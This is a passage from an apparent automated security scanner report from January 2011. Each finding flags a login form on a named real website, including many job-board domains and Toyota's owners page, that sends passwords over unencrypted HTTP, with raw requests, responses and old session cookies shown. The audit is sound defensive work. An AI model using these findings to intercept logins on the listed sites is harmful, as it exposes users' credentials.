Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.realestateandlandcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.101. http://www.recruitingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.recruitingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rtub18ulrc3vam4sd88gmoelh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.recruitingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.102. http://www.researchingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.researchingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=14bsqa9jfj35kburppunl56pe1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.researchingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.103. http://www.resumeboomer.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resumeboomer.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=rflo577r2gvrm7p49d1ei6a8c1; path=/; domain=resumeboomer.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18190


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<!--SLIDE PANEL STARTS-->
<form action="#" method="post" name="resumelogin1">
<div style="font-size:20px; font-weight:bold; padding-left:100px; padding-top:10px;">
...[SNIP]...
<td><input type="password" id="password" name="password" class="input_text" value="Password" onFocus="onfocusval('password','Password')" onBlur="onblurval('password','Password')" /></td>
...[SNIP]...

6.104. http://www.retailcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retailcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105722

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.retailcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.105. http://www.sciencescrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sciencescrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16dk0s9ru5o61n37p22c60grs4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139820

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sciencescrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.106. http://www.scientistcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.scientistcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rkh4pgjirjhh2qdflm011inei3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.scientistcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.107. http://www.sellingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sellingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u9aug9qog02rlvafs62g9l9651; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130266

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sellingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.108. http://www.sqlcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sqlcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ic5cgni73m80fllgi2jl24kau2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109037

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.sqlcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.109. http://www.teenagercrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.teenagercrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=240j3fr7u4qsmuqu986njli7d2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99711

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.teenagercrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.110. http://www.telecomcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.telecomcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fn27b7rlsvo4speggt7vmuaia6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111736

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.telecomcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.111. http://www.toyota.com/owners/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.toyota.com
Path:   /owners/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET /owners/ HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html
Date: Fri, 21 Jan 2011 19:53:46 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 36685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div class="login">
        <form method="post" action="/owners/apps/login_precheck.do" id="mytoyotaLoginForm" name="mytoyotaLoginForm">
               <div class="leftnav_title">
...[SNIP]...
<div class="search_outer">
               <input type="password" class="searchbox" name="password" id="password" onkeypress="clickSubmitOnEnter(event);"/>
            </div>
...[SNIP]...

6.112. http://www.tradingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pce4hd53hci195b2auvv59a984; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...
</script>
                       <form id="loginform" name="loginform" Method="POST" action="http://www.tradingcrossing.com/index.php" onsubmit="return login();" style="margin:0px;">
                       <INPUT type="hidden" name="clslogin_hdnaction" value="LI">
...[SNIP]...
rname" size="12" maxlength="50" class="inputbox" value="Email/Username" onfocus="javascript:setfocusvalue(this,'Email/Username');" onblur="javascript:getfocusvalue(this,'Email/Username');">&nbsp;&nbsp;<input type="password" name="clslogin_password" size="12" maxlength="16" class="inputbox" value="*****" onfocus="javascript:setfocusvalue(this,'*****');" onblur="javascript:getfocusvalue(this,'*****');">
    &nbsp;&nbsp;<input type="submit" name="submit" value="Log In" class="button">
...[SNIP]...

6.113. http://www.trainingcrossing.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trainingcrossing.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0n2gu3r3aojtk5vp93nt6cf8v7; path=/
